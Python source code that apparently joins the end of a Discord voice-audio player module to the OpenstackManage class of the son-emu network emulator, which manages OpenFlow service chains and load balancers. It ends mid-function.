bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
manage.py
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import threading
import uuid
import networkx as nx
import chain_api
import json
import random
from emuvim.api.openstack.resources.net import Net
from emuvim.api.openstack.resources.port import Port
from mininet.node import OVSSwitch, RemoteController, Node
class OpenstackManage(object):
"""
OpenstackManage is a singleton and management component for the emulator.
It is the brain of the Openstack component and manages everything that is not datacenter specific like
network chains or load balancers.
"""
__instance = None
def __new__(cls):
if OpenstackManage.__instance is None:
OpenstackManage.__instance = object.__new__(cls)
return OpenstackManage.__instance
def __init__(self, ip="0.0.0.0", port=4000):
# we are a singleton, only initialize once!
self.lock = threading.Lock()
with self.lock:
if hasattr(self, "init"):
return
self.init = True
self.endpoints = dict()
self.cookies = set()
self.cookies.add(0)
self.ip = ip
self.port = port
self._net = None
# to keep track which src_vnf(input port on the switch) handles a load
# balancer
self.lb_flow_cookies = dict()
self.chain_flow_cookies = dict()
# for the visualization also store the complete chain data incl. paths
self.full_chain_data = dict()
self.full_lb_data = dict()
# flow groups could be handled for each switch separately, but this global group counter should be easier to
# debug and to maintain
self.flow_groups = dict()
# we want one global chain api. this should not be datacenter
# dependent!
self.chain = chain_api.ChainApi(ip, port, self)
self.thread = threading.Thread(target=self.chain._start_flask, args=())
self.thread.name = self.chain.__class__
self.thread.start()
# floating ip network setup
self.floating_switch = None
self.floating_network = None
self.floating_netmask = "192.168.100.0/24"
self.floating_nodes = dict()
self.floating_cookies = dict()
self.floating_intf = None
self.floating_links = dict()
def stop(self):
self.chain.stop()
self.thread.join()
@property
def net(self):
return self._net
@net.setter
def net(self, value):
if self._net is None:
self._net = value
# create default networks
self.init_floating_network()
self._net = value
def init_floating_network(self, name="default"):
"""
Initialize the floating network component for the emulator.
Will not do anything if already initialized.
"""
if self.net is not None and self.floating_switch is None:
# create a floating network
fn = self.floating_network = Net(name)
fn.id = str(uuid.uuid4())
fn.set_cidr(self.floating_netmask)
# create a subnet
fn.subnet_id = str(uuid.uuid4())
fn.subnet_name = fn.name + "-sub"
# create a port for the host
port = Port("root-port")
# port.id = str(uuid.uuid4())
port.net_name = fn.name
# get next free ip
root_ip = fn.get_new_ip_address(port.name)
port.ip_address = root_ip
# floating ip network setup
# wierd way of getting a datacenter object
first_dc = self.net.dcs.values()[0]
# set a dpid for the switch. for this we have to get the id of the
# next possible dc
self.floating_switch = self.net.addSwitch(
"fs1", dpid=hex(first_dc._get_next_dc_dpid())[2:])
# this is the interface appearing on the physical host
self.floating_root = Node('root', inNamespace=False)
self.net.hosts.append(self.floating_root)
self.net.nameToNode['root'] = self.floating_root
self.floating_intf = self.net.addLink(
self.floating_root, self.floating_switch).intf1
self.floating_root.setIP(root_ip, intf=self.floating_intf)
self.floating_nodes[(self.floating_root.name,
root_ip)] = self.floating_root
def stop_floating_network(self):
self._net = None
self.floating_switch = None
def add_endpoint(self, ep):
"""
Registers an openstack endpoint with manage
:param ep: Openstack API endpoint
:type ep: :class:`heat.openstack_api_endpoint`
"""
key = "%s:%s" % (ep.ip, ep.port)
self.endpoints[key] = ep
def get_cookie(self):
"""
Get an unused cookie.
:return: Cookie
:rtype: ``int``
"""
cookie = int(max(self.cookies) + 1)
self.cookies.add(cookie)
return cookie
def get_flow_group(self, src_vnf_name, src_vnf_interface):
"""
Gets free group that is not currently used by any other flow for the specified interface / VNF.
:param src_vnf_name: Source VNF name
:type src_vnf_name: ``str``
:param src_vnf_interface: Source VNF interface name
:type src_vnf_interface: ``str``
:return: Flow group identifier.
:rtype: ``int``
"""
if (src_vnf_name, src_vnf_interface) not in self.flow_groups:
grp = int(len(self.flow_groups) + 1)
self.flow_groups[(src_vnf_name, src_vnf_interface)] = grp
else:
grp = self.flow_groups[(src_vnf_name, src_vnf_interface)]
return grp
def check_vnf_intf_pair(self, vnf_name, vnf_intf_name):
"""
Checks if a VNF exists and has the given interface
:param vnf_name: Name of the VNF to be checked
:type vnf_name: ``str``
:param vnf_intf_name: Name of the interface that belongst to the VNF
:type vnf_intf_name: ``str``
:return: ``True`` if it is valid pair, else ``False``
:rtype: ``bool``
"""
if vnf_name in self.net:
vnf = self.net.getNodeByName(vnf_name)
return vnf_intf_name in vnf.nameToIntf
def network_action_start(self, vnf_src_name, vnf_dst_name, **kwargs):
"""
Starts a network chain for a source destination pair
:param vnf_src_name: Name of the source VNF
:type vnf_src_name: ``str``
:param vnf_dst_name: Name of the source VNF interface
:type vnf_dst_name: ``str``
:param \**kwargs: See below
:Keyword Arguments:
* *vnf_src_interface* (``str``): Name of source interface.
* *vnf_dst_interface* (``str``): Name of destination interface.
* *weight* (``int``): This value is fed into the shortest path computation if no path is specified.
* *match* (``str``): A custom match entry for the openflow flow rules. Only vlanid or port possible.
* *bidirectional* (``bool``): If set the chain will be set in both directions, else it will just set up \
from source to destination.
* *cookie* (``int``): Cookie value used by openflow. Used to identify the flows in the switches to be \
able to modify the correct flows.
* *no_route* (``bool``): If set a layer 3 route to the target interface will not be set up.
:return: The cookie chosen for the flow.
:rtype: ``int``
"""
try:
vnf_src_interface = kwargs.get('vnf_src_interface')
vnf_dst_interface = kwargs.get('vnf_dst_interface')
layer2 = kwargs.get('layer2', True)
match = kwargs.get('match')
flow = (vnf_src_name, vnf_src_interface,
vnf_dst_name, vnf_dst_interface)
if flow in self.chain_flow_cookies:
raise Exception(
"There is already a chain at the specified src/dst pair!")
# set up a layer 2 chain, this allows multiple chains for the same
# interface
src_node = self.net.getNodeByName(vnf_src_name)
dst_node = self.net.getNodeByName(vnf_dst_name)
dst_intf = dst_node.intf(vnf_dst_interface)
if layer2:
switch, inport = self._get_connected_switch_data(
vnf_src_name, vnf_src_interface)
self.setup_arp_reply_at(
switch, inport, dst_intf.IP(), dst_intf.MAC())
if isinstance(match, str):
match += ",dl_dst=%s" % dst_intf.MAC()
else:
match = "dl_dst=%s" % dst_intf.MAC()
cookie = kwargs.get('cookie', self.get_cookie())
self.cookies.add(cookie)
self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=vnf_src_interface,
vnf_dst_interface=vnf_dst_interface,
cmd='add-flow',
weight=kwargs.get('weight'),
match=match,
bidirectional=False,
cookie=cookie,
path=kwargs.get('path'))
# to keep this logic seperate of the core son-emu do the
# housekeeping here
data = dict()
data["src_vnf"] = vnf_src_name
data["src_intf"] = vnf_src_interface
data["dst_vnf"] = vnf_dst_name
data["dst_intf"] = vnf_dst_interface
data["cookie"] = cookie
data["layer2"] = layer2
if kwargs.get('path') is not None:
data["path"] = kwargs.get('path')
else:
data["path"] = self._get_path(vnf_src_name, vnf_dst_name, vnf_src_interface,
vnf_dst_interface)[0]
# add route to dst ip to this interface
# this might block on containers that are still setting up, so
# start a new thread
if not kwargs.get('no_route'):
# son_emu does not like concurrent commands for a container so we need to lock this if multiple chains
# on the same interface are created
src_node.setHostRoute(dst_node.intf(
vnf_dst_interface).IP(), vnf_src_interface)
try:
son_emu_data = json.loads(
self.get_son_emu_chain_data(vnf_src_name))
except BaseException:
son_emu_data = dict()
if "son_emu_data" not in son_emu_data:
son_emu_data["son_emu_data"] = dict()
if "interfaces" not in son_emu_data["son_emu_data"]:
son_emu_data["son_emu_data"]["interfaces"] = dict()
if vnf_src_interface not in son_emu_data["son_emu_data"]["interfaces"]:
son_emu_data["son_emu_data"]["interfaces"][vnf_src_interface] = list()
son_emu_data["son_emu_data"]["interfaces"][vnf_src_interface].append(
dst_intf.IP())
self.set_son_emu_chain_data(vnf_src_name, son_emu_data)
if kwargs.get('bidirectional', False):
# call the reverse direction
path = kwargs.get('path')
if path is not None:
path = list(reversed(path))
self.network_action_start(vnf_dst_name, vnf_src_name, vnf_src_interface=vnf_dst_interface,
vnf_dst_interface=vnf_src_interface, bidirectional=False,
layer2=kwargs.get('layer2', False), path=path,
no_route=kwargs.get('no_route'))
self.full_chain_data[flow] = data
self.chain_flow_cookies[flow] = cookie
return cookie
except Exception as ex:
logging.exception("RPC error.")
raise Exception(ex.message)
def network_action_stop(self, vnf_src_name, vnf_dst_name, **kwargs):
"""
Starts a network chain for a source destination pair
:param vnf_src_name: Name of the source VNF
:type vnf_src_name: ``str``
:param vnf_dst_name: Name of the source VNF interface
:type vnf_dst_name: ``str``
:param \**kwargs: See below
:Keyword Arguments:
* *vnf_src_interface* (``str``): Name of source interface.
* *vnf_dst_interface* (``str``): Name of destination interface.
* *bidirectional* (``bool``): If set the chain will be torn down in both directions, else it will just\
be torn down from source to destination.
* *cookie* (``int``): Cookie value used by openflow. Used to identify the flows in the switches to be \
able to modify the correct flows.
"""
try:
if 'cookie' in kwargs:
return self.delete_flow_by_cookie(kwargs.get('cookie'))
if kwargs.get('bidirectional', False):
self.delete_chain_by_intf(vnf_dst_name, kwargs.get('vnf_dst_interface'),
vnf_src_name, kwargs.get('vnf_src_interface'))
return self.delete_chain_by_intf(vnf_src_name, kwargs.get('vnf_src_interface'),
vnf_dst_name, kwargs.get('vnf_dst_interface'))
except Exception as ex:
logging.exception("RPC error.")
return ex.message
def set_son_emu_chain_data(self, vnf_name, data):
"""
Set son-emu chain data for this node.
:param vnf_name: The name of the vnf where the data is stored.
:type vnf_name: ``str``
:param data: Raw data to store on the node.
:type data: ``str``
"""
self.net.getNodeByName(vnf_name).cmd(
"echo \'%s\' > /tmp/son_emu_data.json" % json.dumps(data))
ip_list = []
for intf in data['son_emu_data']['interfaces'].values():
ip_list.extend(intf)
self.net.getNodeByName(vnf_name).cmd(
"echo \'%s\' > /tmp/son_emu_data" % "\n".join(ip_list))
def get_son_emu_chain_data(self, vnf_name):
"""
Get the current son-emu chain data set for this node.
:param vnf_name: The name of the vnf where the data is stored.
:type vnf_name: ``str``
:return: raw data stored on the node
:rtype: ``str``
"""
return self.net.getNodeByName(vnf_name).cmd(
"cat /tmp/son_emu_data.json")
def _get_connected_switch_data(self, vnf_name, vnf_interface):
"""
Get the switch an interface is connected to
:param vnf_name: Name of the VNF
:type vnf_name: ``str``
:param vnf_interface: Name of the VNF interface
:type vnf_interface: ``str``
:return: List containing the switch, and the inport number
:rtype: [``str``, ``int``]
"""
src_sw = None
src_sw_inport_nr = None
for connected_sw in self.net.DCNetwork_graph.neighbors(vnf_name):
link_dict = self.net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if (link_dict[link]['src_port_id'] == vnf_interface or
link_dict[link][
'src_port_name'] == vnf_interface):
# found the right link and connected switch
src_sw = connected_sw
src_sw_inport_nr = link_dict[link]['dst_port_nr']
break
return src_sw, src_sw_inport_nr
def _get_path(self, src_vnf, dst_vnf, src_vnf_intf, dst_vnf_intf):
"""
Own implementation of the get_path function from DCNetwork, because we just want the path and not set up
flows on the way.
:param src_vnf: Name of the source VNF
:type src_vnf: ``str``
:param dst_vnf: Name of the destination VNF
:type dst_vnf: ``str``
:param src_vnf_intf: Name of the source VNF interface
:type src_vnf_intf: ``str``
:param dst_vnf_intf: Name of the destination VNF interface
:type dst_vnf_intf: ``str``
:return: path, src_sw, dst_sw
:rtype: ``list``, ``str``, ``str``
"""
# modified version of the _chainAddFlow from
# emuvim.dcemulator.net._chainAddFlow
src_sw = None
dst_sw = None
logging.debug("Find shortest path from vnf %s to %s",
src_vnf, dst_vnf)
for connected_sw in self.net.DCNetwork_graph.neighbors(src_vnf):
link_dict = self.net.DCNetwork_graph[src_vnf][connected_sw]
for link in link_dict:
if (link_dict[link]['src_port_id'] == src_vnf_intf or
link_dict[link][
'src_port_name'] == src_vnf_intf):
# found the right link and connected switch
src_sw = connected_sw
break
for connected_sw in self.net.DCNetwork_graph.neighbors(dst_vnf):
link_dict = self.net.DCNetwork_graph[connected_sw][dst_vnf]
for link in link_dict:
if link_dict[link]['dst_port_id'] == dst_vnf_intf or \
link_dict[link][
'dst_port_name'] == dst_vnf_intf:
# found the right link and connected
dst_sw = connected_sw
break
logging.debug("From switch %s to %s " % (src_sw, dst_sw))
# get shortest path
try:
# returns the first found shortest path
# if all shortest paths are wanted, use: all_shortest_paths
path = nx.shortest_path(self.net.DCNetwork_graph, src_sw, dst_sw)
except BaseException:
logging.exception("No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}".format(
src_vnf, dst_vnf, src_sw, dst_sw))
logging.debug("Graph nodes: %r" % self.net.DCNetwork_graph.nodes())
logging.debug("Graph edges: %r" % self.net.DCNetwork_graph.edges())
for e, v in self.net.DCNetwork_graph.edges():
logging.debug("%r" % self.net.DCNetwork_graph[e][v])
return "No path could be found between {0} and {1}".format(
src_vnf, dst_vnf)
logging.info("Shortest path between {0} and {1}: {2}".format(
src_vnf, dst_vnf, path))
return path, src_sw, dst_sw
def add_loadbalancer(self, src_vnf_name, src_vnf_interface, lb_data):
"""
This function will set up a loadbalancer at the given interface.
:param src_vnf_name: Name of the source VNF
:type src_vnf_name: ``str``
:param src_vnf_interface: Name of the destination VNF
:type src_vnf_interface: ``str``
:param lb_data: A dictionary containing the destination data as well as custom path settings
:type lb_data: ``dict``
:Example:
lbdata = {"dst_vnf_interfaces": {"dc2_man_web0": "port-man-2",
"dc3_man_web0": "port-man-4","dc4_man_web0": "port-man-6"}, "path": {"dc2_man_web0": {"port-man-2": [ "dc1.s1",\
"s1", "dc2.s1"]}}}
"""
net = self.net
src_sw_inport_nr = 0
src_sw = None
dest_intfs_mapping = lb_data.get('dst_vnf_interfaces', dict())
# a custom path can be specified as a list of switches
custom_paths = lb_data.get('path', dict())
dest_vnf_outport_nrs = list()
logging.debug("Call to add_loadbalancer at %s intfs:%s" %
(src_vnf_name, src_vnf_interface))
if not self.check_vnf_intf_pair(src_vnf_name, src_vnf_interface):
raise Exception(u"Source VNF %s or intfs %s does not exist" % (
src_vnf_name, src_vnf_interface))
# find the switch belonging to the source interface, as well as the
# inport nr
for connected_sw in net.DCNetwork_graph.neighbors(src_vnf_name):
link_dict = net.DCNetwork_graph[src_vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == src_vnf_interface:
src_sw = connected_sw
src_sw_inport_nr = link_dict[link]['dst_port_nr']
break
if src_sw is None or src_sw_inport_nr == 0:
raise Exception(u"Source VNF or interface can not be found.")
# get all target interface outport numbers
for vnf_name in dest_intfs_mapping:
if vnf_name not in net.DCNetwork_graph:
raise Exception(u"Target VNF %s is not known." % vnf_name)
for connected_sw in net.DCNetwork_graph.neighbors(vnf_name):
link_dict = net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == dest_intfs_mapping[vnf_name]:
dest_vnf_outport_nrs.append(
int(link_dict[link]['dst_port_nr']))
# get first switch
if (src_vnf_name, src_vnf_interface) not in self.lb_flow_cookies:
self.lb_flow_cookies[(src_vnf_name, src_vnf_interface)] = list()
src_ip = None
src_mac = None
for intf in net[src_vnf_name].intfs.values():
if intf.name == src_vnf_interface:
src_mac = intf.mac
src_ip = intf.ip
# set up paths for each destination vnf individually
index = 0
cookie = self.get_cookie()
main_cmd = "add-flow -OOpenFlow13"
self.lb_flow_cookies[(src_vnf_name, src_vnf_interface)].append(cookie)
# bookkeeping
data = dict()
data["src_vnf"] = src_vnf_name
data["src_intf"] = src_vnf_interface
data["paths"] = list()
data["cookie"] = cookie
# lb mac for src -> target connections
lb_mac = "31:33:70:%02x:%02x:%02x" % (random.randint(
0, 255), random.randint(0, 255), random.randint(0, 255))
# calculate lb ip as src_intf.ip +1
octets = src_ip.split('.')
octets[3] = str(int(octets[3]) + 1)
plus_one = '.'.join(octets)
# set up arp reply as well as add the route to the interface
self.setup_arp_reply_at(src_sw, src_sw_inport_nr,
plus_one, lb_mac, cookie=cookie)
net.getNodeByName(src_vnf_name).setHostRoute(
plus_one, src_vnf_interface)
for dst_vnf_name, dst_vnf_interface in dest_intfs_mapping.items():
path, src_sw, dst_sw = self._get_path(src_vnf_name, dst_vnf_name,
src_vnf_interface, dst_vnf_interface)
# use custom path if one is supplied
# json does not support hashing on tuples so we use nested dicts
if custom_paths is not None and dst_vnf_name in custom_paths:
if dst_vnf_interface in custom_paths[dst_vnf_name]:
path = custom_paths[dst_vnf_name][dst_vnf_interface]
logging.debug("Taking custom path from %s to %s: %s" % (
src_vnf_name, dst_vnf_name, path))
if not self.check_vnf_intf_pair(dst_vnf_name, dst_vnf_interface):
self.delete_loadbalancer(src_vnf_name, src_vnf_interface)
raise Exception(u"VNF %s or intfs %s does not exist" %
(dst_vnf_name, dst_vnf_interface))
if isinstance(path, dict):
self.delete_loadbalancer(src_vnf_name, src_vnf_interface)
raise Exception(
u"Can not find a valid path. Are you specifying the right interfaces?.")
target_mac = "fa:17:00:03:13:37"
target_ip = "0.0.0.0"
for intf in net[dst_vnf_name].intfs.values():
if intf.name == dst_vnf_interface:
target_mac = str(intf.mac)
target_ip = str(intf.ip)
dst_sw_outport_nr = dest_vnf_outport_nrs[index]
current_hop = src_sw
switch_inport_nr = src_sw_inport_nr
# self.setup_arp_reply_at(src_sw, src_sw_inport_nr, target_ip, target_mac, cookie=cookie)
net.getNodeByName(dst_vnf_name).setHostRoute(
src_ip, dst_vnf_interface)
# choose free vlan if path contains more than 1 switch
if len(path) > 1:
vlan = net.vlans.pop()
if vlan == 0:
vlan = net.vlans.pop()
else:
vlan = None
single_flow_data = dict()
single_flow_data["dst_vnf"] = dst_vnf_name
single_flow_data["dst_intf"] = dst_vnf_interface
single_flow_data["path"] = path
single_flow_data["vlan"] = vlan
single_flow_data["cookie"] = cookie
data["paths"].append(single_flow_data)
# src to target
for i in range(0, len(path)):
if i < len(path) - 1:
next_hop = path[i + 1]
else:
# last switch reached
next_hop = dst_vnf_name
next_node = net.getNodeByName(next_hop)
if next_hop == dst_vnf_name:
switch_outport_nr = dst_sw_outport_nr
logging.info("end node reached: {0}".format(dst_vnf_name))
elif not isinstance(next_node, OVSSwitch):
logging.info(
"Next node: {0} is not a switch".format(next_hop))
return "Next node: {0} is not a switch".format(next_hop)
else:
# take first link between switches by default
index_edge_out = 0
switch_outport_nr = net.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']
cmd = 'priority=1,in_port=%s,cookie=%s' % (
switch_inport_nr, cookie)
cmd_back = 'priority=1,in_port=%s,cookie=%s' % (
switch_outport_nr, cookie)
# if a vlan is picked, the connection is routed through
# multiple switches
if vlan is not None:
if path.index(current_hop) == 0: # first node
# flow #index set up
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',reg1=%s' % index
cmd += ',actions='
# set vlan id
cmd += ',push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd += ',set_field:%s->vlan_vid' % masked_vlan
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# last switch for reverse route
# remove any vlan tags
cmd_back += ',dl_vlan=%s' % vlan
cmd_back += ',actions=pop_vlan,output:%s' % switch_inport_nr
elif next_hop == dst_vnf_name: # last switch
# remove any vlan tags
cmd += ',dl_vlan=%s' % vlan
cmd += ',actions=pop_vlan,output:%s' % switch_outport_nr
# set up arp replys at the port so the dst nodes know
# the src
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += 'push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd_back += ',set_field:%s->vlan_vid' % masked_vlan
cmd_back += ',set_field:%s->eth_src' % lb_mac
cmd_back += ',set_field:%s->ip_src' % plus_one
cmd_back += ',output:%s' % switch_inport_nr
else: # middle nodes
# if we have a circle in the path we need to specify this, as openflow will ignore the packet
# if we just output it on the same port as it came in
if switch_inport_nr == switch_outport_nr:
cmd += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
cmd_back += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
else:
cmd += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_outport_nr)
cmd_back += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_inport_nr)
# output the packet at the correct outport
else:
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',reg1=%s' % index
cmd += ',actions='
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += ',set_field:%s->eth_src' % lb_mac
cmd_back += ',set_field:%s->ip_src' % plus_one
cmd_back += ',output:%s' % src_sw_inport_nr
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
# excecute the command on the target switch
logging.debug(cmd)
cmd = "\"%s\"" % cmd
cmd_back = "\"%s\"" % cmd_back
net[current_hop].dpctl(main_cmd, cmd)
net[current_hop].dpctl(main_cmd, cmd_back)
# set next hop for the next iteration step
if isinstance(next_node, OVSSwitch):
switch_inport_nr = net.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']
current_hop = next_hop
# advance to next destination
index += 1
# set up the actual load balancing rule as a multipath on the very
# first switch
cmd = '"in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % (cookie)
cmd += ',ip'
cmd += ',actions='
# push 0x01 into the first register
cmd += 'load:0x1->NXM_NX_REG0[]'
# load balance modulo n over all dest interfaces
# TODO: in newer openvswitch implementations this should be changed to symmetric_l3l4+udp
# to balance any kind of traffic
cmd += ',multipath(symmetric_l4,1024,modulo_n,%s,0,NXM_NX_REG1[0..12])' % len(
dest_intfs_mapping)
# reuse the cookie as table entry as it will be unique
cmd += ',resubmit(, %s)"' % cookie
# actually add the flow
logging.debug("Switch: %s, CMD: %s" % (src_sw, cmd))
net[src_sw].dpctl(main_cmd, cmd)
# finally add all flow data to the internal data storage
self.full_lb_data[(src_vnf_name, src_vnf_interface)] = data
def add_floating_lb(self, datacenter, lb_data):
"""
This function will set up a loadbalancer at the given datacenter.
This function returns the floating ip assigned to the loadbalancer as multiple ones are possible.
:param datacenter: The datacenter entrypoint
:type datacenter: ``str``
:param lb_data: A dictionary containing the destination data as well as custom path settings
:type lb_data: ``dict``
:Example:
lbdata = {"dst_vnf_interfaces": {"dc2_man_web0": "port-man-2",
"dc3_man_web0": "port-man-4","dc4_man_web0": "port-man-6"}, "path": {"dc2_man_web0": {"port-man-2": [ "dc1.s1",\
"s1", "dc2.s1"]}}}
"""
net = self.net
src_sw_inport_nr = 1
src_sw = self.floating_switch.name
dest_intfs_mapping = lb_data.get('dst_vnf_interfaces', dict())
# a custom path can be specified as a list of switches
custom_paths = lb_data.get('path', dict())
dest_vnf_outport_nrs = list()
if datacenter not in self.net.dcs:
raise Exception(u"Source datacenter can not be found.")
# get all target interface outport numbers
for vnf_name in dest_intfs_mapping:
if vnf_name not in net.DCNetwork_graph:
raise Exception(u"Target VNF %s is not known." % vnf_name)
for connected_sw in net.DCNetwork_graph.neighbors(vnf_name):
link_dict = net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == dest_intfs_mapping[vnf_name]:
dest_vnf_outport_nrs.append(
int(link_dict[link]['dst_port_nr']))
if len(dest_vnf_outport_nrs) == 0:
raise Exception(
"There are no paths specified for the loadbalancer")
src_ip = self.floating_intf.IP()
src_mac = self.floating_intf.MAC()
# set up paths for each destination vnf individually
index = 0
cookie = self.get_cookie()
main_cmd = "add-flow -OOpenFlow13"
floating_ip = self.floating_network.get_new_ip_address(
"floating-ip").split("/")[0]
for dst_vnf_name, dst_vnf_interface in dest_intfs_mapping.items():
path = None
# use custom path if one is supplied
# json does not support hashing on tuples so we use nested dicts
if custom_paths is not None and dst_vnf_name in custom_paths:
if dst_vnf_interface in custom_paths[dst_vnf_name]:
path = custom_paths[dst_vnf_name][dst_vnf_interface]
logging.debug("Taking custom path to %s: %s" %
(dst_vnf_name, path))
else:
if datacenter not in self.floating_links:
self.floating_links[datacenter] = \
net.addLink(self.floating_switch, datacenter)
path = \
self._get_path(self.floating_root.name, dst_vnf_name,
self.floating_intf.name, dst_vnf_interface)[0]
if isinstance(path, dict):
self.delete_flow_by_cookie(cookie)
raise Exception(
u"Can not find a valid path. Are you specifying the right interfaces?.")
intf = net[dst_vnf_name].nameToIntf[dst_vnf_interface]
target_mac = str(intf.MAC())
target_ip = str(intf.IP())
dst_sw_outport_nr = dest_vnf_outport_nrs[index]
current_hop = src_sw
switch_inport_nr = src_sw_inport_nr
vlan = net.vlans.pop()
# iterate all switches on the path
for i in range(0, len(path)):
if i < len(path) - 1:
next_hop = path[i + 1]
else:
# last switch reached
next_hop = dst_vnf_name
next_node = net.getNodeByName(next_hop)
# sanity checks
if next_hop == dst_vnf_name:
switch_outport_nr = dst_sw_outport_nr
logging.info("end node reached: {0}".format(dst_vnf_name))
elif not isinstance(next_node, OVSSwitch):
logging.info(
"Next node: {0} is not a switch".format(next_hop))
return "Next node: {0} is not a switch".format(next_hop)
else:
# take first link between switches by default
index_edge_out = 0
switch_outport_nr = net.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']
# default filters, just overwritten on the first node and last
# node
cmd = 'priority=1,in_port=%s,cookie=%s' % (
